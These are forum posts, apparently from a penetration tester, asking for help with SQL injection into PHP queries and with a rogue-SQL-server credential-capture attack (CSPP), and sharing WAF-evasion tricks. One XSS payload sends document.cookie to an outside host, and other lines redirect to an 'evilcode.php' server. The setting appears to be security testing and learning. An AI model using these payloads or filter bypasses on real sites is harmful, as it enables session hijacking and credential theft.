Total sense. I should have done that earlier! That helped, along with turning on logging in MySQL to see the queries.

Unfortunately, I realized that magic_quotes is on in PHP(I thought I checked that earlier), so I don't know if this is even exploitable, since the id parameter is quoted. If it weren't, it would be fair game, but I don't see a way out of this one without single quotes.

If I'm missing anything obvious, let me know!

Still no luck. I removed the quotes from the ID parameter in the PHP code to test and was able to use some true/false statements to verify that I could inject, but as soon as I add the singe quotes back into the code, it's no go.

Any time I provide anything other than an integer in the ID field, I get the "Data truncated" error. If I try to inject anything into the comment field, it gets put into the DB exactly as I typed it. I don't see any escaping in the code, but can't figure out why it won't work with the single quotes on that field.


On a similar note, is it possible to inject into a query that gets provided to the mysql_num_rows function? I haven't been able to get it working. I have some code like this and am wondering it's exploitable as well:
$query=mysql_query("SELECT *  FROM products WHERE id=" . $id);
   $number = mysql_num_rows($query);


Thanks for the help

Thanks for the info, guys. I'm gonna look into it this morning and I'll post back with the outcome. The ID parameter is an integer, so I don't know why quotes are around it, but it's not my code. I'll try changing the code and testing it to see the results, but I'd also like to get it working with how the code is now, if that's even possible.
Either way, I'm gonna go at it a few more times this morning and see what I can find.

Hi all,

I'm having trouble making SQL injection work with an INSERT statement and I'm not sure what I'm doing wrong. The PHP code for the SQL request looks like this:

mysql_query("INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST['id'] . "','" . $_POST['comment']. "')")

Whenever I try to insert into the comment field, it doesn't seem to work. If I attempt to insert into the ID field, it gives me the error "ERROR: Data truncated for column "id" at row 1". It does that even if I just add a ' to the id parameter. If I put a character other than a number into the ID field, I get the error "ERROR: Out of range value adjusted for column "id" at row 1".

When I attempt in the comment field, my whole query goes into the database, special characters and all. There doesn't seem to be any escaping done in the PHP code, so I can't tell why I can't get it to work.
Any obvious mistakes I'm making?

I was considering buying the bundle, but it seems that you must use the exam vouchers within a certain period, right? I don't want to buy both and only have 120 days or something to finish both courses and exams. I've been unable to get a response from Armando, and don't know when my 50% coupon code(for being eCCPT silver) runs out. His original email says May 30, but I had a feeling he may mean April 30th.

You're probably right. I guess proving the CSPP vulnerability is present will have to be enough for now. Thanks for your help.

So, I even emailed Chema and he verified that getting that error is normal, but even though it's an untrusted domain, you should still be able to grab the hashes before that error is raised. He suggested Cain for sniffing, but Cain isn't grabbing anything, even when I did a test connection with valid credentials and no error. I have the PCAP with the traffic, but can't pick out if there are any hashes.
Are there any other good sniffers out there for capturing SQL or NTLM credentials?
I ran the pcap through dsniff, but didn't get any results.

Looks like this is now moving more into the realm of network pen testing.

The error in the SQL log says:
SSPI handshake failed with error code 0x8009030c, state 14 while establishing a connection with integrated security; the connection has been closed. Reason: AcceptSecurityContext failed. The Windows error code indicates the cause of failure. The logon attempt failed. [CLIENT: xxx.xxx.xxx.xxx]

Even though I set this box up as a domain controller, the SQL instance still shows as COMPUTERNAME\sqlinstance instead of DOMAINNAME\sqlinstance.

The more I look at it, I think it may be a problem with DNS name mismatches. When I enter my IP as the data source on the victim's server, it seems to do a reverse DNS lookup and connect via the DNS name, which doesn't match the Active directory domain name of the system. So, it will try to connect to something like d-127-0-0-1.comcast.net\sqlinstance instead of DOMAINNAME\sqlinstance.

On the actual SQL/AD server, if I try to log into via SQL Management studio to d-127-0-0-1.comcast.net\sqlinstance, it gives me the same "untrusted domain" error.

I tried adding d-127-0-0-1.comcast.net to the hosts file and pointing it back to the server, but no change.

Sorry if this post makes no sense - I've been going at it all day and may be a little loopy.

Thanks for the reply. The target server is SQL Server 2012. I've set up rogue servers with SQL 2005, 2008, and 2012 Express versions.
I'm in the process of setting up a SQL instance on a test domain controller with the same domain name as the target domain.

I wish there was a way to use the CSPP attack to cause the target server to send over it's SQL user credentials, not Windows,then this wouldn't be an issue, but I don't think that's possible.

I'll check out that link a little more and check the logs on this new server once I get it up and running. I'll post back after i find out more.

Hi all,

So, I'm testing out a web app and found a CSPP vulnerability, as detailed here (http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf). Chema illustrates setting up a rogue SQL server and forcing the victim to connect to your server, while you sniff their windows credentials.
Whenever I set up a rogue server and force a connection, I don't get the goods from the victim. I set up Cain to sniff, as in the white paper, but nothing. I loaded up wireshark and see some NTLMSSP messages back and forth, but then my rogue server responds with "Login failed. The login is from an untrusted domain and cannot be used with Windows authentication."
The victim and rogue server are not on the same network or domain.

Does anyone know of a way to configure my rogue server to accept the victim domain and therefore capture the credentials? Thanks in advance!

Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.

Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden html form that's auto submitted by javascript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multi-part/formdata but no luck. The CSRF vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an http POST request with Javascript to submit it, but I'm not sure how.

Any input is appreciated!

Well, I've never gone up against urlscan before but I just beat F5's ASM XSS filter for the first time, so maybe some of the same tricks will work.

Some of the things I used were:
1. I ditched using <script> because I couldn't get it passed. Instead used<image>. Notice it's not <img>. The WAF would filter <img> tags but not <image> and Firefox would display <image> just fine.
Try iframe, style, and object tags too.

2. Split up the attack between parameters if possible. Break it at key points where the WAF won't be able to understand what's going on.

3. If ()'s are being blocked, you can try redirecting to a server that you own and get your code to run from there. I couldn't load directly to the site that I was attacking and it was filtering most javascript actions, but I was able to use an image tag and slip a "location" in an onload like this:
onload=location="http://server/evilcode.php".

4. I also ran across spots where the letters "http" were filtered. Here you can usually drop the http: and just use //server/evilcode.php.


I don't know if any of that will be any help at all, and may be completely irrelevant to urlscan, but those are some of the things I've learned with evasion and hopefully some of it carries over.

Yeah, that budget range definitely is all over the place. Right now I don't think there is a defined budget, which is why the plan went from ModSecurity to F5, and may go back to ModSecurity! It's up in the air right now, but I'm assuming I have budget backing.

F5 is definitely what I'd like to go with and seems like a mature product. I'm glad you agree with me on the VM question. F5 does have a virtual solution, but I've heard some criticism on it. Security concerns aside, it just seems like a better option to keep the security boxes separate for the sake of simplicity and even performance as you said. It seems weird to me to have the load balancer on the same system that you're balancing the load for...

Anyway, thanks for your input, I wanted to make sure I wasn't way off in my thinking.

So, if I were to get a WAF that also doubled as a load balancer, does anyone have any advice on a good option? I've been looking at F5, Netscaler, Fortiweb, Armorlogic, and Baracuda. I'd consider Imperva as well, but it doesn't have load balancing capabilities. Most of the reviews I've found are dated, so I'd love to hear some opinions!


Also, I have a question on implementation. Do you see problems with deploying a WAF/Load Balancer as a virtual machine on the same ESX server as the web servers? I prefer to have them as physically separate and have some concerns about putting them on the same box, but I'm not sure if I'm just over-thinking it.

Thanks guys!